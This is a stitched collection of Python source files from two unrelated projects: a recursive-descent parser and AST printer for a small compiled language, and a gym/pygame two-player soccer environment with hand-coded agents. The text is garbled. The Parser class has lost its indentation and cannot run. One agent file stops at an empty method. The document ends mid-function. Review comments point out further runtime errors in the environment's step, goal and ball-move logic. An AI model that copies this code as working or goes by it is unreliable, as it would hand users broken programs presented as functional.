            self.print(f'{title}[{index}]', element)
    def print_node(self, title, node):
        self.print_single(title, f'{node.__class__.__name__}:')
        self.indent_level += 1
        node.print_node(self)
        self.indent_level -= 1
    def print_single(self, title, text):
        indent = ' ' * self.indent_level
        cprint(f'{indent}{title}: {text}', 'blue', attrs=['bold'])
    def print_token(self, title, token):
        # Prefer the token's literal value; fall back to its type name.
        if token.value == '':
            text = f'{token.type} (ln={token.line_no})'
        else:
            text = f'{token.value} (ln={token.line_no})'
        self.print_single(title, text)
--- FILE SEPARATOR ---
from lexer import Token, Input
from errors import ParserError, ParserDebugError
from .ast import Node, TypePrim, ExprLit, ExprVar, ExprUnary, ExprDeref, ExprAddress, ExprBinArith, ExprBinComparison, \
ExprBinEquality, ExprBinLogic, ExprFnCall, Param, Program, DeclFn, StmtBlock, StmtIf, \
StmtWhile, StmtBreak, StmtContinue, StmtReturn, StmtExpr, StmtAssign, StmtVarDecl, \
IfBranch, TypePointer, StmtFor
# Lexer token types for assignment operators -> internal operator names
# stored in StmtAssign.op.
assign_ops = {
    'OP_ASSIGN_EQ': 'EQUALS',
    'OP_ASSIGN_SUM': 'PLUS_EQUALS',
    'OP_ASSIGN_SUB': 'MINUS_EQUALS',
    'OP_ASSIGN_MUL': 'MULT_EQUALS',
    'OP_ASSIGN_DIV': 'DIV_EQUALS',
    'OP_ASSIGN_MOD': 'MOD_EQUALS',
}
# Unary operator token types -> internal operator names (ExprUnary.op).
unary_ops = {
    'OP_INCR': 'INCR',
    'OP_DECR': 'DECR',
    'OP_NOT': 'NOT',
    'OP_PTR': 'PTR_DEREF',
    'OP_PTR_ADDR': 'PTR_ADDR',
}
# Primitive-type keyword tokens -> the type names used by TypePrim.
primary_types_keywords = {
    'KW_BOOL': 'bool',
    'KW_FLOAT': 'float',
    'KW_INT': 'int',
    'KW_VOID': 'void',
    'KW_CHAR': 'char',
    'KW_STR': 'string',
}
# Tokens that may begin a keyword statement; used to validate a for-init.
statement_keywords = [
    'KW_IF',
    'KW_FOR',
    'KW_WHILE',
    'KW_BREAK',
    'KW_CONTINUE',
    'KW_RETURN',
]
class Parser:
curr_input: Input
tokens: list
offset: int
curr_token: Token
result: Node
def __init__(self, curr_input, tokens) -> None:
self.curr_input = curr_input
self.tokens = tokens
self.offset = 0
self.curr_token = self.tokens[self.offset]
self.result = Node()
def accept(self, token_type):
token = self.curr_token
if token.type == token_type:
self.offset += 1
self.curr_token = self.tokens[self.offset]
return token
else:
return False
def expect(self, token_type):
token = self.accept(token_type)
if token:
return token
else:
self.err(token_type)
def parse_program(self):
decls = []
while True:
if self.peek('EOF'):
# todo leave this hack?
eof = self.tokens[self.offset]
break
else:
decls.append(self.parse_decl())
return Program(decls, eof)
def parse_decl(self):
return self.parse_decl_fn()
def parse_decl_fn(self):
self.expect('KW_FN')
name = self.expect('IDENT')
params = self.parse_params()
self.expect('KW_FN_RET_ARROW')
ret_type = self.parse_type()
body = self.parse_stmt_block()
return DeclFn(name, params, ret_type, body)
def parse_param(self):
type_ = self.parse_type()
name = self.expect('IDENT')
return Param(name, type_)
def parse_params(self):
params = []
self.expect('OP_PAREN_O')
if self.peek('OP_PAREN_C'):
self.accept('OP_PAREN_C')
return params
else:
params.append(self.parse_param())
while not self.accept('OP_PAREN_C'):
self.expect('OP_COMMA')
params.append(self.parse_param())
return params
def parse_type(self):
token_type = self.curr_token.type
if token_type in primary_types_keywords.keys():
token = self.expect(token_type)
type_ = TypePrim(primary_types_keywords[token_type], token)
while self.accept('OP_PTR'):
type_ = TypePointer(type_)
return type_
else:
self.err('type name')
def parse_stmt_block(self):
self.expect('OP_BRACE_O')
stmts = []
while True:
if self.accept('OP_BRACE_C'):
break
else:
stmts.append(self.parse_stmt())
pass
return StmtBlock(stmts)
def parse_stmt(self):
stmt = ''
if self.peek('IDENT'):
if self.peek2('OP_PAREN_O'):
stmt = self.parse_stmt_expr(self.parse_expr_fn_call())
else:
stmt = self.parse_stmt_assign()
elif self.curr_token.type in unary_ops.keys():
unary_expr = self.parse_expr_unary()
if self.curr_token.type in assign_ops.keys():
stmt = self.parse_stmt_assign(unary_expr)
else:
stmt = unary_expr
elif self.peek('KW_IF'):
return self.parse_stmt_if()
elif self.peek('KW_FOR'):
return self.parse_stmt_for()
elif self.peek('KW_WHILE'):
return self.parse_stmt_while()
elif self.peek('KW_BREAK'):
stmt = self.parse_stmt_break()
elif self.peek('KW_CONTINUE'):
stmt = self.parse_stmt_continue()
elif self.peek('KW_RETURN'):
stmt = self.parse_stmt_ret()
elif self.curr_token.type in primary_types_keywords.keys():
stmt = self.parse_stmt_var_decl()
else:
self.err('legit token in the beginning of a statement')
self.expect('OP_SEMICOLON')
return stmt
def parse_stmt_if(self):
self.expect('KW_IF')
self.expect('OP_PAREN_O')
cond = self.parse_expr()
self.expect('OP_PAREN_C')
body = self.parse_stmt_block()
branches = [IfBranch(cond, body)]
if self.peek('KW_ELIF'):
while self.accept('KW_ELIF'):
self.expect('OP_PAREN_O')
cond = self.parse_expr()
self.expect('OP_PAREN_C')
body = self.parse_stmt_block()
branches.append(IfBranch(cond, body))
stmt_block = None
if self.peek('KW_ELSE'):
self.expect('KW_ELSE')
stmt_block = self.parse_stmt_block()
return StmtIf(branches, stmt_block)
def parse_stmt_for(self):
self.expect('KW_FOR')
self.expect('OP_PAREN_O')
for_init = for_cond = for_step = ''
if not self.accept('OP_SEMICOLON'):
if self.curr_token.type not in statement_keywords:
for_init = self.parse_stmt()
else:
self.err('for init condition (assignment, declaration, expression)')
if not self.accept('OP_SEMICOLON'):
for_cond = self.parse_expr()
self.expect('OP_SEMICOLON')
if not self.accept('OP_PAREN_C'):
for_step = self.parse_expr()
self.expect('OP_PAREN_C')
for_body = self.parse_stmt_block()
return StmtFor(for_init, for_cond, for_step, for_body)
def parse_for_cond(self):
if self.peek('IDENT'):
for assign_op in assign_ops.keys():
if self.peek2(assign_op):
return self.parse_stmt_assign()
else:
self.result = self.parse_expr()
self.expect('OP_SEMICOLON')
return self.result
def parse_stmt_while(self):
self.expect('KW_WHILE')
self.expect('OP_PAREN_O')
cond = self.parse_expr()
self.expect('OP_PAREN_C')
body = self.parse_stmt_block()
return StmtWhile(cond, body)
def parse_stmt_break(self):
break_kw = self.expect('KW_BREAK')
print(type(break_kw))
return StmtBreak(break_kw)
def parse_stmt_continue(self):
continue_kw = self.expect('KW_CONTINUE')
return StmtContinue(continue_kw)
def parse_stmt_ret(self):
return_kw = self.expect('KW_RETURN')
if self.curr_token.type != 'OP_SEMICOLON':
value = self.parse_expr()
else:
value = None
return StmtReturn(return_kw, value)
def parse_stmt_var_decl(self):
type_ = self.parse_type()
name = self.expect('IDENT')
value = None
if self.accept('OP_ASSIGN_EQ'):
value = self.parse_expr()
return StmtVarDecl(name, type_, value)
def parse_stmt_assign(self, lhs=None):
if not lhs:
lhs = self.parse_expr_unary()
op = ''
if self.curr_token.type in assign_ops.keys():
op = assign_ops[self.curr_token.type]
self.accept(self.curr_token.type)
else:
self.err('assign operator')
value = self.parse_expr()
return StmtAssign(lhs, op, value)
def parse_stmt_expr(self, expr):
self.result = expr
return StmtExpr(self.result)
def parse_expr_fn_call(self):
name = self.expect('IDENT')
args = []
self.expect('OP_PAREN_O')
if not self.peek('OP_PAREN_C'):
args.append(self.parse_expr())
while not self.peek('OP_PAREN_C'):
self.expect('OP_COMMA')
args.append(self.parse_expr())
self.expect('OP_PAREN_C')
return ExprFnCall(name, args)
def parse_expr(self):
return self.parse_expr_or()
def parse_expr_or(self):
self.result = self.parse_expr_and()
while True:
if self.accept('KW_OR'):
self.result = ExprBinLogic('logical_or', 'OR', self.result, self.parse_expr_and())
else:
break
return self.result
def parse_expr_and(self):
self.result = self.parse_expr_cmp()
while True:
if self.accept('KW_AND'):
self.result = ExprBinLogic('logical_and', 'AND', self.result, self.parse_expr_cmp())
else:
break
return self.result
def parse_expr_cmp(self):
self.result = self.parse_expr_rel()
while True:
if self.accept('OP_IS_EQ'):
self.result = ExprBinEquality('eq', 'EQUAL', self.result, self.parse_expr_rel())
elif self.accept('OP_IS_NEQ'):
self.result = ExprBinEquality('eq', 'NOT_EQUAL', self.result, self.parse_expr_rel())
else:
break
return self.result
def parse_expr_rel(self):
self.result = self.parse_expr_sum_sub()
while True:
if self.accept('OP_G'):
self.result = ExprBinComparison('cmp', 'GREATER', self.result, self.parse_expr_sum_sub())
elif self.accept('OP_GE'):
self.result = ExprBinComparison('cmp', 'GREATER_OR_EQUAL', self.result, self.parse_expr_sum_sub())
elif self.accept('OP_L'):
self.result = ExprBinComparison('cmp', 'LESS', self.result, self.parse_expr_sum_sub())
elif self.accept('OP_LE'):
self.result = ExprBinComparison('cmp', 'LESS_OR_EQUAL', self.result, self.parse_expr_sum_sub())
else:
break
return self.result
def parse_expr_sum_sub(self):
self.result = self.parse_expr_mul_div_mod()
while True:
if self.accept('OP_SUM'):
self.result = ExprBinArith('arith', 'ADD', self.result, self.parse_expr_mul_div_mod())
elif self.accept('OP_SUB'):
self.result = ExprBinArith('arith', 'SUB', self.result, self.parse_expr_mul_div_mod())
else:
break
return self.result
def parse_expr_mul_div_mod(self):
self.result = self.parse_expr_unary()
while True:
if self.accept('OP_MUL'):
self.result = ExprBinArith('arith', 'MUL', self.result, self.parse_expr_unary())
elif self.accept('OP_DIV'):
self.result = ExprBinArith('arith', 'DIV', self.result, self.parse_expr_unary())
elif self.accept('OP_MOD'):
self.result = ExprBinArith('arith', 'MOD', self.result, self.parse_expr_unary())
else:
break
return self.result
def parse_expr_unary(self):
if self.curr_token.type in unary_ops.keys():
op = unary_ops[self.curr_token.type]
self.accept(self.curr_token.type)
expr = self.parse_expr()
if op == 'PTR_DEREF':
return ExprDeref(expr, op)
elif op == 'PTR_ADDR':
return ExprAddress(expr, op)
else:
return ExprUnary(expr, op)
else:
return self.parse_expr_primary()
def parse_expr_primary(self):
    """Parse a primary expression: variable/call, literal, or parenthesized.

    Fix: the KW_NULL test was a bare `if` breaking the elif chain.
    Behavior happened to be identical (every earlier branch returns),
    but the mixed style invited bugs; all branches are now elif.
    """
    if self.peek('IDENT'):
        # An identifier followed by '(' is a function call.
        if self.peek2('OP_PAREN_O'):
            return self.parse_expr_fn_call()
        else:
            return self.parse_expr_var()
    elif self.peek('LIT_INT'):
        return self.parse_expr_lit_int()
    elif self.peek('LIT_FLOAT'):
        return self.parse_expr_lit_float()
    elif self.peek('LIT_CHAR'):
        return self.parse_expr_lit_char()
    elif self.peek('LIT_STR'):
        return self.parse_expr_lit_str()
    elif self.peek('KW_NULL'):
        return self.parse_expr_lit_null()
    elif self.peek('KW_TRUE'):
        return self.parse_expr_lit_true()
    elif self.peek('KW_FALSE'):
        return self.parse_expr_lit_false()
    elif self.peek('OP_PAREN_O'):
        return self.parse_expr_paren()
    else:
        self.err('type literal/NULL/parenthesis')
def parse_expr_lit_int(self):
    """Parse an integer literal into an ExprLit node."""
    return ExprLit(self.expect('LIT_INT'), 'INT')
def parse_expr_lit_float(self):
    """Parse a floating-point literal into an ExprLit node."""
    return ExprLit(self.expect('LIT_FLOAT'), 'FLOAT')
def parse_expr_lit_char(self):
    """Parse a character literal into an ExprLit node."""
    return ExprLit(self.expect('LIT_CHAR'), 'CHAR')
def parse_expr_lit_str(self):
    """Parse a string literal into an ExprLit node."""
    return ExprLit(self.expect('LIT_STR'), 'STR')
def parse_expr_lit_null(self):
    """Parse the NULL keyword into an ExprLit node."""
    return ExprLit(self.expect('KW_NULL'), 'NULL')
def parse_expr_lit_true(self):
    """Parse the `true` keyword into an ExprLit node.

    NOTE(review): the type tag 'True' is mixed-case, unlike the
    upper-case tags ('INT', 'NULL', ...) used by the other literals --
    preserved as-is; confirm downstream code expects this.
    """
    return ExprLit(self.expect('KW_TRUE'), 'True')
def parse_expr_lit_false(self):
    """Parse the `false` keyword into an ExprLit node.

    NOTE(review): tag 'False' is mixed-case like 'True' above; see the
    casing note there.
    """
    return ExprLit(self.expect('KW_FALSE'), 'False')
def parse_expr_paren(self):
    """Parse a parenthesized sub-expression: '(' expr ')'."""
    self.expect('OP_PAREN_O')
    self.result = self.parse_expr()
    self.expect('OP_PAREN_C')
    return self.result
def parse_expr_var(self):
    """Parse a plain identifier into an ExprVar node."""
    return ExprVar(self.expect('IDENT'))
# helper functions
def peek(self, token_type):
    """Return True if the current token has the given type (no consume)."""
    current = self.tokens[self.offset]
    return current.type == token_type
def peek2(self, next_token_type):
    """Return True if the token after the current one has the given type."""
    lookahead = self.tokens[self.offset + 1]
    return lookahead.type == next_token_type
def err(self, exp_token=None, msg=None, debug=False):
    """Raise a parse error at the current token.

    `debug` selects ParserDebugError over ParserError; both receive the
    message, the token's source position, the expected token, and the
    actual token type.
    """
    error_cls = ParserDebugError if debug else ParserError
    raise error_cls(msg, *self.curr_token.get_char_info(), exp_token, self.curr_token.type)
|
[
"/errors/errors.py",
"/lexer/__init__.py",
"/lexer/lexer.py",
"/main.py",
"/parser/__init__.py",
"/parser/ast.py",
"/parser/ast_printer.py",
"/parser/parser.py"
] |
00schen/AICooperation
|
from gym.spaces import Discrete
#Agent needs to know bounds, goal, kick, other player positions, player velocities
class Agent:
    """Base class for soccer agents; one agent controls one player."""

    def __init__(self, player, env):
        self.player = player
        # Fix: the env argument was accepted but discarded; keep a handle
        # so subclasses (which already pass it up) can use it.
        self.env = env

    def select_action(self, state):
        """Return the action to take for `state`; subclasses override."""
        pass

    def train(self, i_episode, done):
        """Learning hook; no-op in the base class."""
        pass
--- FILE SEPARATOR ---
import random
from math import pi
from math import cos
from math import sin
from math import atan2
from Point import Point
from Agents.Agent import Agent
from gym.spaces import Discrete
class NaiveAgent(Agent):
def __init__(self, player, env):
    """Create a naive (hand-coded) agent for `player` in `env`."""
    super().__init__(player, env)
def select_action(self, state):
    """Return an action tuple for the current env state.

    Assumes state[-1] is the last (code, team) response where code 1 is
    a goal and 2 a penalty, and state[-2] is the ball -- TODO confirm
    against the env's screen() output. Returns (1, start_pos) to reset
    after a goal/penalty, else (0, direction) from determine_action.
    """
    ball = state[-2]
    if state[-1].x == 2 or state[-1].x == 1:
        return (1, self.player.start_pos)
    return (0, self.determine_action(ball))
def optimize(self):
--- FILE SEPARATOR ---
import random
from math import pi
from math import cos
from math import sin
from math import atan2
from Point import Point
from Agents.Agent import Agent
class NaiveAgent(Agent):
    """Hand-coded agent that steers its player relative to the ball.

    Fixes: removed two per-step debug print() calls and a large block of
    commented-out dead code (__side_reset).
    """

    def __init__(self, player, env):
        super().__init__(player, env)

    def select_action(self, state):
        """Return (1, start_pos) after a goal/penalty, else (0, direction).

        Assumes state[-1] is the last (code, team) response and state[-2]
        is the ball -- TODO confirm against the env.
        """
        ball = state[-2]
        if state[-1].x == 2 or state[-1].x == 1:
            return (1, self.player.start_pos)
        return (0, self.determine_action(ball))

    def determine_action(self, ball):
        """Map player velocity vs. ball direction to a direction key (1-4).

        NOTE(review): when vel_angle == ball_angle and speed_sq >= 1 the
        method falls through and returns None -- confirm callers tolerate
        that (Player.move treats unknown actions as a no-op).
        """
        speed_sq = self.player.x_vel**2 + self.player.y_vel**2
        vel_angle = atan2(self.player.y_vel, self.player.x_vel)
        q = self.player.center.sub(ball)
        ball_dist_sq = q.x**2 + q.y**2
        ball_angle = atan2(q.y, q.x)
        if ball_dist_sq <= 200 and speed_sq > 100:
            if vel_angle < ball_angle:
                if vel_angle <= pi and vel_angle > pi / 2:
                    return 3
                elif vel_angle <= pi / 2 and vel_angle > 0:
                    return 4
                elif vel_angle <= 0 and vel_angle > pi / -2:
                    return 1
                else:
                    return 2
            elif vel_angle > ball_angle or speed_sq < 1:
                if vel_angle <= pi and vel_angle > pi / 2:
                    return 2
                elif vel_angle <= pi / 2 and vel_angle > 0:
                    return 3
                elif vel_angle <= 0 and vel_angle > pi / -2:
                    return 4
                else:
                    return 1
        else:
            if vel_angle < ball_angle:
                if vel_angle <= pi and vel_angle > pi / 2:
                    return 4
                elif vel_angle <= pi / 2 and vel_angle > 0:
                    return 1
                elif vel_angle <= 0 and vel_angle > pi / -2:
                    return 2
                else:
                    return 3
            elif vel_angle > ball_angle or speed_sq < 1:
                if vel_angle <= pi and vel_angle > pi / 2:
                    return 1
                elif vel_angle <= pi / 2 and vel_angle > 0:
                    return 2
                elif vel_angle <= 0 and vel_angle > pi / -2:
                    return 3
                else:
                    return 4
--- FILE SEPARATOR ---
from SoccerEnv import SoccerEnv
from Soccer import *
from Point import Point
from Agents.NaiveAgent import NaiveAgent
def make(version):
    """Build and return (env, agents) for the named configuration.

    Unknown versions -- including the not-yet-implemented "Naive" --
    yield (None, None).
    """
    if version == "test1":
        return test1()
    return None, None
def run_simulation(version):
    """Run one interactive episode of the named configuration.

    NOTE(review): `done` returned by env.step() is immediately
    overwritten by env.render()'s return value, so the loop actually
    ends on the renderer's quit flag, not on the game's done flag --
    confirm this is intended.
    """
    env, agents = make(version)
    done = False
    state = env.screen()
    while not done:
        actions = []
        for agent in agents:
            # Select and perform an action
            actions.append(agent.select_action(state))
        print(actions)
        print(state)
        state, _, done = env.step(actions)
        done = env.render()
    env.close()
def test1():
    """Two NaiveAgents facing off from opposite thirds of the pitch."""
    blue = Player(Point(WIDTH / 3, HEIGHT / 2), 10, TEAM_BLUE)
    red = Player(Point(WIDTH * 2 / 3, HEIGHT / 2), 10, TEAM_RED)
    environment = SoccerEnv([blue, red])
    return environment, (NaiveAgent(blue, environment), NaiveAgent(red, environment))
run_simulation("test1")
--- FILE SEPARATOR ---
class ExpSolution:
    """Interface for exploration strategies."""

    def decision(self):
        """Return True to explore; concrete strategies must override."""
        raise NotImplementedError
--- FILE SEPARATOR ---
#Adapted from Pytorch DQN Tutorial:
#https://pytorch.org/tutorials/intermediate/reinforcement_q_learning.html
import math
import random

import ExpSolutions.ExpSolution
from ExpSolutions.ExpSolution import ExpSolution
EPS_START = 0.9
EPS_END = 0.05
EPS_DECAY = 200
class SimpleExp3(ExpSolution):
    """Epsilon-greedy exploration with exponential epsilon decay."""

    def __init__(self):
        # Number of decisions made so far; drives the decay schedule.
        self.steps_done = 0

    def decision(self):
        """Return True when a random draw exceeds the decayed epsilon.

        Fixes: the original signature omitted `self`, and the body read
        the bare name `steps_done` (NameError) instead of the instance
        attribute.
        """
        sample = random.random()
        eps_threshold = EPS_END + (EPS_START - EPS_END) * \
            math.exp(-1. * self.steps_done / EPS_DECAY)
        self.steps_done += 1
        return sample > eps_threshold
--- FILE SEPARATOR ---
#Will be reserved for UI purpose only
import Engine
def main():
    """UI entry point; not yet implemented."""
    pass
main()
--- FILE SEPARATOR ---
class Point:
    """A 2D point with simple non-mutating vector arithmetic."""

    def __init__(self, x, y):
        self.x = x
        self.y = y

    def add(self, p):
        """Return a new Point equal to self + p."""
        return Point(self.x + p.x, self.y + p.y)

    def sub(self, p):
        """Return a new Point equal to self - p."""
        return Point(self.x - p.x, self.y - p.y)

    def mult(self, m):
        """Return a new Point scaled by the scalar m."""
        return Point(self.x * m, self.y * m)

    @staticmethod
    def normSq(p, q):
        """Squared Euclidean distance between points p and q.

        Fix: the original declared this as an instance method with no
        `self`; every caller invokes it as Point.normSq(a, b), so it is
        now explicitly static.
        """
        return (p.x - q.x)**2 + (p.y - q.y)**2

    def __str__(self):
        return "({},{})".format(self.x, self.y)

    def __repr__(self):
        return self.__str__()

    def __eq__(self, other):
        return self.x == other.x and self.y == other.y
--- FILE SEPARATOR ---
# Adapted from pygame.draw tutorial:
# https://www.pygame.org/docs/ref/draw.html
import pygame
from pygame import draw
from Soccer import *
from Point import Point
# Define the colors we will use in RGB format
BLACK = ( 0, 0, 0)
WHITE = (255, 255, 255)
BLUE = ( 0, 0, 255)
GREEN = ( 0, 255, 0)
RED = (255, 0, 0)
YELLOW = (255, 255, 0)
# Scale factor from game coordinates to screen pixels.
ENLARGE = 3
# Pixel margins around the pitch on each side.
XBUFFER = 10
YBUFFER = 10
class Renderer:
    """Draws the soccer stage (players, ball, borders, goals) with pygame."""

    def __init__(self, stage):
        size = [ENLARGE * WIDTH + 2*XBUFFER,
                ENLARGE * HEIGHT + 2*YBUFFER]
        self.screen = pygame.display.set_mode(size)
        self.stage = stage

    def regular_cycle(self):
        """Draw one frame; return True when the user closed the window."""
        done = False
        for event in pygame.event.get():  # User did something
            if event.type == pygame.QUIT:  # If user clicked close
                done = True  # Flag that we are done so we exit this loop
        # Clear the screen and set the screen background
        self.screen.fill(WHITE)
        # Draw players
        for player in self.stage.players:
            point = Renderer.__translate(player.center)
            if player.team == TEAM_BLUE:
                draw.circle(self.screen, BLUE, point, player.radius)
            else:
                draw.circle(self.screen, RED, point, player.radius)
        # Draw ball
        ball = self.stage.ball
        point = Renderer.__translate(ball.center)
        draw.circle(self.screen, GREEN, point, ball.radius)
        # Draw borders
        r = Renderer.__translate(Point(0, HEIGHT)) + (WIDTH*ENLARGE, HEIGHT*ENLARGE)
        draw.rect(self.screen, BLACK, r, 2)
        # Draw goal. Fix: Goal stores its opening as `.net`; the original
        # read the nonexistent `.inner`, which raised AttributeError.
        g1, g2 = self.stage.walls[2].net, self.stage.walls[3].net
        gg1, gg2 = [0, 0], [0, 0]
        for i in range(2):
            gg1[i], gg2[i] = Renderer.__translate(g1[i]), Renderer.__translate(g2[i])
        draw.line(self.screen, YELLOW, *gg1, 2)
        draw.line(self.screen, YELLOW, *gg2, 2)
        pygame.display.flip()
        return done

    @staticmethod
    def __translate(p):
        """Map a game-space Point to an (x, y) pixel tuple.

        Fix: uses ENLARGE instead of the hard-coded 3 so the scale stays
        consistent with the window size computed in __init__.
        """
        p = p.mult(ENLARGE)
        p = p.add(Point(XBUFFER, YBUFFER))
        return (int(p.x), int(p.y))
--- FILE SEPARATOR ---
# implements gym.Env
# TODO: work out action_space
# TODO: make random non-repetitive
import random
from Soccer import *
import numpy as np
from math import fabs
import gym
from gym import spaces
import pygame
from Renderer import Renderer
from Point import Point
# Effectively disables episode termination (threshold is unreachable).
END_CONDITION = lambda x: x >= 1e10
# END_CONDITION = lambda score: score[0] >= 7 or score[1] >= 7
# NOTE(review): these may shadow same-named constants pulled in by
# `from Soccer import *` above -- confirm which definitions win.
WIDTH = 400
HEIGHT = 200
TEAM_RED = 1
TEAM_BLUE = 2
class SoccerEnv(gym.Env):
    """
    Only ONE instance is supposed to run at a time
    """

    def __init__(self, players):
        pygame.init()
        self.players = players
        self.seed()
        self.stage = Stage()
        self.steps = 0
        # Four direction-key actions; see Player.move for the mapping.
        self.action_space = spaces.Discrete(4)
        self.discrete_space = spaces.Box(low=np.array([0, 0]),
                                         high=np.array([WIDTH / 4, HEIGHT / 4]), dtype=int)
        self.continuous_space = spaces.Box(low=np.array([0, 0]),
                                           high=np.array([WIDTH, HEIGHT]))
        self.renderer = Renderer(self.stage)
        self.clock = pygame.time.Clock()

    def seed(self, seed=None):
        """Seed the global random module used by Stage/Ball."""
        random.seed(seed)

    def step(self, actions):
        """Advance one tick; intended to return (state, rewards, done).

        NOTE(review): `self.state` is never assigned anywhere in this
        class and `done` is an unbound local, so this raises as written.
        Presumably `game_state` returned by move_cycle was meant to feed
        both -- needs an upstream fix before this env can run.
        """
        self.steps += 1
        game_state = self.stage.move_cycle(actions, self.players)
        reward = []
        for player in self.players:
            reward.append(self.reward(player, self.state[-1]))
        # stage needs to give feedback if ball is scored.
        return self.state, reward, done

    def screen(self):
        """Return the current observation (see the self.state note in step)."""
        return self.state

    def reset(self):
        """Start a fresh stage and tick counter."""
        self.stage = Stage()
        self.steps = 0
        self.clock = pygame.time.Clock()

    def render(self):
        """Draw a frame at ~3 FPS; returns the renderer's quit flag."""
        self.clock.tick(3)
        return self.renderer.regular_cycle()

    def close(self):
        pygame.quit()

    def reward(self, player, response):
        """Score a (code, team) response from Stage.move_cycle for `player`.

        Codes: 1 = goal, 2 = penalty/out-of-bounds, else ongoing.
        NOTE(review): for a goal, move_cycle reports the SCORING team in
        response.y, yet the scoring team's own player gets -100 here --
        the sign looks inverted; confirm the intended convention.
        """
        if response.x == 1:
            if response.y == player.team:
                return -100
            else:
                return 100
        elif response.x == 2:
            if response.y == player.team:
                return -100
            else:
                return 0
        else:
            if response.y == player.team:
                return 1
            else:
                return -1
class Stage:
    """Holds the pitch geometry, ball, score, and per-tick game logic."""

    def __init__(self):
        bounds = [Point(0, 0), Point(WIDTH, 0), Point(0, HEIGHT), Point(WIDTH, HEIGHT)]
        # Blue goal is walls[2] (Left), Red goal is walls[3] (Right)
        self.walls = [
            Wall((bounds[0], bounds[1])), Wall((bounds[2], bounds[3])),
            Goal((bounds[0], bounds[2]),
                 (Point(0, HEIGHT / 3), Point(0, HEIGHT * 2 / 3))),
            Goal((bounds[1], bounds[3]),
                 (Point(WIDTH, HEIGHT / 3), Point(WIDTH, HEIGHT * 2 / 3)))
        ]
        self.ball = Ball(Point(WIDTH / 2, HEIGHT / 2))
        # Randomly pick the starting possession (bool indexes the tuple).
        self.possession = (TEAM_BLUE, TEAM_RED)[random.randint(0, 1) == 0]
        # score[0] = blue goals, score[1] = red goals (see move_cycle).
        self.score = [0, 0]

    def move_cycle(self, actions, players):
        """
        Returns new state of game.
        0 - continue
        1 - goal scored
        2 - penalty
        """
        for i in range(len(players)):
            player = players[i]
            action = actions[i]
            player.move(action)
            for other in players:
                if Circle.collide(player, other) and player != other:
                    player.revert_move()
            if Circle.collide(player, self.ball):
                self.possession = player.team
                # Ball.move(player) applies the kick impulse.
                self.ball.move(player)
        # NOTE(review): Ball.move requires a `player` argument, so this
        # bare call raises TypeError as written -- see the fix on Ball.
        self.ball.move()
        scored = self.__ball_scored()
        if scored:
            # NOTE(review): Circle/Ball define restart(center), not
            # replace(); this raises AttributeError when a goal occurs --
            # confirm the intended re-placement point.
            self.ball.replace()
            if scored == TEAM_RED:
                self.score[1] += 1
                return (1, TEAM_RED)
            else:
                self.score[0] += 1
                return (1, TEAM_BLUE)
        elif self.__ball_out_bounds():
            # Restart in front of whichever team last touched the ball.
            if self.possession == TEAM_BLUE:
                self.ball.restart(Point(WIDTH / 4, HEIGHT / 2))
            else:
                self.ball.restart(Point(WIDTH * 3/4, HEIGHT / 2))
            return (2, self.possession)
        else:
            return (0, None)

    def __ball_scored(self):
        """Return the scoring team, or 0 when no goal happened this tick."""
        if self.walls[2].has_scored(self.ball) \
                or self.ball.center.x < 0:
            return TEAM_RED
        elif self.walls[3].has_scored(self.ball) \
                or self.ball.center.x > WIDTH:
            return TEAM_BLUE
        else:
            return 0

    def __ball_out_bounds(self):
        """True when the ball touches any wall (goals excluded by Goal.collide)."""
        return self.walls[0].collide(self.ball) \
            or self.walls[1].collide(self.ball) \
            or self.walls[2].collide(self.ball) \
            or self.walls[3].collide(self.ball)
class Wall:
    """An axis-aligned boundary line of the pitch."""

    HORIZONTAL = 1
    VERTICAL = 2

    def __init__(self, bounds):
        """bounds: pair of endpoint objects with .x/.y; orientation inferred."""
        self.bounds = bounds
        # Fix: qualify the class constants -- the original read the bare
        # names VERTICAL/HORIZONTAL inside the method body, which raises
        # NameError at runtime.
        if bounds[0].x == bounds[1].x:
            self.orientation = Wall.VERTICAL
        else:
            self.orientation = Wall.HORIZONTAL

    def collide(self, c):
        """True if circle c (with .center and .radius) touches this wall's line."""
        if self.orientation == Wall.HORIZONTAL:
            # Check y values
            return fabs(c.center.y - self.bounds[0].y) <= c.radius
        else:
            # Check x values
            return fabs(c.center.x - self.bounds[0].x) <= c.radius

    def __str__(self):
        return "Bound 1: {}\nBound 2: {} \nOrientation: {}"\
            .format(self.bounds[0], self.bounds[1], self.orientation)
class Goal(Wall):
    """A wall segment containing a scoring net opening."""

    def __init__(self, bounds, net):
        super().__init__(bounds)
        # Pair of Points bounding the net opening along this wall.
        self.net = net

    def has_scored(self, b):
        """True if ball b touches this wall's line inside the net opening.

        Fix: the original ended with `net.collide(b)` -- `net` is an
        unbound name here (and the attribute is a tuple of Points with no
        collide method), so it raised NameError. The wall-line test lives
        on the Wall superclass.
        """
        bound1 = min(self.net[0].y, self.net[1].y)
        bound2 = max(self.net[0].y, self.net[1].y)
        within_bounds = b.center.y >= bound1 and b.center.y <= bound2
        return super().collide(b) and within_bounds

    def collide(self, b):
        """Wall collision that excludes the net opening (a scored ball passes)."""
        return super().collide(b) and not self.has_scored(b)

    def __str__(self):
        return super().__str__() + "\nGoal bound 1: {}\nGoal bound 2: {}"\
            .format(self.net[0], self.net[1])
class Circle:
    """A movable circle; shared base for Ball and Player."""

    def __init__(self, center, radius):
        # Where the circle is re-placed when its owner resets.
        self.start_pos = center
        self.center = center
        self.radius = radius
        self.x_vel = 0
        self.y_vel = 0

    def move(self):
        """Advance the circle by its current velocity."""
        dp = Point(self.x_vel, self.y_vel)
        self.center = self.center.add(dp)

    @staticmethod
    def collide(c0, c1):
        """True if circles c0 and c1 overlap.

        Fix: declared static explicitly -- the original had no `self`
        and only worked via the class-call form Circle.collide(a, b).
        """
        return Point.normSq(c0.center, c1.center) \
            <= (c0.radius + c1.radius)**2

    def restart(self, center):
        """Re-place the circle at `center` with zero velocity."""
        self.center = center
        self.x_vel, self.y_vel = 0, 0

    def __str__(self):
        return "\nCenter: {} \nRadius: {}"\
            .format(self.center, self.radius)
class Ball(Circle):
    """The ball: a radius-5 circle that can be kicked by players."""

    def __init__(self, center):
        super().__init__(center, 5)

    def move(self, player=None):
        """Kick when given a player; plain positional move otherwise.

        Fix: the original override required `player`, which made Stage's
        bare `self.ball.move()` call a TypeError. With player=None this
        falls back to Circle.move(), matching both call sites.
        """
        if player is None:
            super().move()
            return
        # fix this
        # Momentum-based kicking: velocity impulse only, plus a small
        # random nudge; position advances on the next bare move().
        player_mass = .5
        delx, dely = random.random(), random.random()
        self.x_vel += player_mass*player.x_vel + delx
